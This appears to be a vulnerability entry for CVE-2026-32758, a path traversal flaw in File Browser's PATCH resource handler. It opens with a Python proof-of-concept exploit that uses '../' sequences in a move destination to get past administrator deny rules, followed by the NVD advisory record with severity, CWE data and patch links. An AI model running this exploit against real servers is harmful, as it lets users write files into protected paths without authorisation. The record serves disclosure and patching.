CVE-2026-32758

import requests import json # Configuration target_url = "http://example.com/api/resources/" username = "attacker" password = "password" login_url = "http://example.com/api/login" # 1. Authenticate session = requests.Session() login_data = {"username": username, "password": password} response = session.post(login_url, data=login_data) if response.status_code != 200: print("Login failed") exit(1) # 2. Prepare malicious payload # Attempt to move 'malicious.txt' to a protected directory using path traversal source_file = "malicious.txt" # The destination contains '../' to bypass deny rules configured on 'protected_dir' destination_path = "../../protected_dir/malicious.txt" headers = {"Content-Type": "application/json"} payload = { "action": "move", # or 'rename' depending on context "destination": destination_path, "overwrite": True } # 3. Send Exploit Request # Assuming the endpoint structure based on resourcePatchHandler description exploit_url = f"{target_url}{source_file}" response = session.patch(exploit_url, headers=headers, data=json.dumps(payload)) if response.status_code == 200: print("[+] Exploit successful! File moved to restricted path.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text)

{"cve": {"id": "CVE-2026-32758", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:17.093", "lastModified": "2026-03-23T16:55:20.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Versions 2.61.2 and below are vulnerable to Path Traversal through the resourcePatchHandler (http/resource.go). The destination path in resourcePatchHandler is validated against access rules before being cleaned/normalized, while the actual file operation calls path.Clean() afterward—resolving .. sequences into a different effective path. This allows an authenticated user with Create or Rename permissions to bypass administrator-configured deny rules (both prefix-based and regex-based) by injecting .. sequences in the destination parameter of a PATCH request. As a result, the user can write or move files into any deny-rule-protected path within their scope. However, this cannot be used to escape the user's BasePathFs scope or read from restricted paths. This issue has been fixed in version 2.62.0."}, {"lang": "es", "value": "File Browser es una interfaz de gestión de archivos para subir, eliminar, previsualizar, renombrar y editar archivos dentro de un directorio especificado. Las versiones 2.61.2 e inferiores son vulnerables a Salto de ruta a través del resourcePatchHandler (http/resource.go). La ruta de destino en resourcePatchHandler se valida contra las reglas de acceso antes de ser limpiada/normalizada, mientras que la operación de archivo real llama a path.Clean() después, resolviendo secuencias de .. en una ruta efectiva diferente. Esto permite a un usuario autenticado con permisos de Creación o Renombrado eludir las reglas de denegación configuradas por el administrador (tanto basadas en prefijos como en expresiones regulares) inyectando secuencias de .. en el parámetro de destino de una solicitud PATCH. Como resultado, el usuario puede escribir o mover archivos a cualquier ruta protegida por reglas de denegación dentro de su ámbito. Sin embargo, esto no puede usarse para escapar del ámbito BasePathFs del usuario o leer de rutas restringidas. Este problema ha sido solucionado en la versión 2.62.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.62.0", "matchCriteriaId": "7E5C9E4B-8749-44EA-AB8D-1292D4C9DB65"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/commit/4bd7d69c82163b201a987e99c0c50d7ecc6ee5f1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-9f3r-2vgw-m8xp", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}